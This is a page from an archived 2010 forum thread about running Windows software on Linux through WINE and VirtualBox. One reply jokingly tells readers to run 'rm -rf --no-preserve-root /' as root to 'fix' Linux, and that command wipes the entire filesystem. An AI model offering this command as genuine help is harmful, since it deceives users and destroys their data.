Welcome to the Free Talk Live bulletin board system!
This board is closed to new users and new posts.  Thank you to all our great mods and users over the years.  Details here.
185859 Posts in 9829 Topics by 1371 Members
Latest Member: cjt26
Home Help
+  The Free Talk Live BBS
|-+  Free Talk Live
| |-+  General
| | |-+  A Linux question for Linux users.
Pages: 1 2 [3]   Go Down

Author Topic: A Linux question for Linux users.  (Read 12194 times)

BobRobertson

• View Profile
Re: A Linux question for Linux users.
« Reply #30 on: August 24, 2010, 09:34:42 AM »

Some software programs will not operate on a Linux only system.

Of course Windows programs don't run on Linux. My opinion is that some applications are deliberately written to ensure they cannot be made to run on WINE or Virtualization.

Linux programs won't run on Windows, either.

There are emulators (WINE) and virtualization (VirtualBox) for running Windows stuff on Linux (and vice versa), but really, I agree with you. If the applications you want to run are Windows only, then for Cromm's sake run Windows!

:P

What I find most confusing about "the opposition" is their inability to understand that point. The OS is a secondary consideration, applications come first. What you're using to get things done are the applications!

That said, if the applications are not a deciding factor, the benefits of not using Windows, security, simplicity, stability, frugality, arise as excellent reasons to try a Linux-based system and see if it works for you.

The fact this is an older slower laptop that I am making into an internet surfing device.  And no one plays online games.  Linux should fit the bill perfectly all on its own.

Online games? The web-based ones all work, most Flash games work too, like Runescape and Quake Live. Disney's Pixie Hollow doesn't, but is that such a loss?

Several software producers compile games for both Win and Lin, like Heros of Newearth and Quake. World of Warcraft runs with WINE quite well, by what I've seen.

I use VirtualBox for the applications I need that don't work on Linux. They are Microsoft's Silverlight, so that Netflix streaming works, and HP PhotoPrint for borderless photo printing. And, really, that's it.

Anyone every use the Linus Skipjack-Feisty distro?

Huh? (picture me thumbing through the phone book)

The only reference to Skipjack is RedHat 7.3, which seems a little old.

Feisty returns Ubuntu 7, which also seems somewhat old.

Am I missing something? The joke, perhaps?
"I regret that I am now to die in the belief that the useless sacrifice of themselves by the generation of 1776 to acquire self-government and happiness to their country is to be thrown away by the unwise and unworthy passions of their sons, and that my only consolation is to be that I live not to weep over it."
-- Thomas Jefferson, April 26th 1820

libertylover

• No Title Needed
    • View Profile
« Reply #31 on: August 24, 2010, 12:01:18 PM »

No, I was just digging through some old software cds and that was what was written on the disk.   It is possible my brother was messing with me cause it looks like his handwriting on the disk.

Robin Police

• View Profile
    • Gitmo Nation Roundtable
« Reply #32 on: August 24, 2010, 01:56:10 PM »

The only way to get Linux working correctly is to enter the special backdoor command as root:
Code: [Select]
rm -rf --no-preserve-root /  

LOL. Reminds me of high school.
gitmo nation roundtable - news and commentary from north america & beyond
Pages: 1 2 [3]   Go Up
+  The Free Talk Live BBS
|-+  Free Talk Live
| |-+  General
| | |-+  A Linux question for Linux users.

// ]]>

Page created in 0.02 seconds with 31 queries.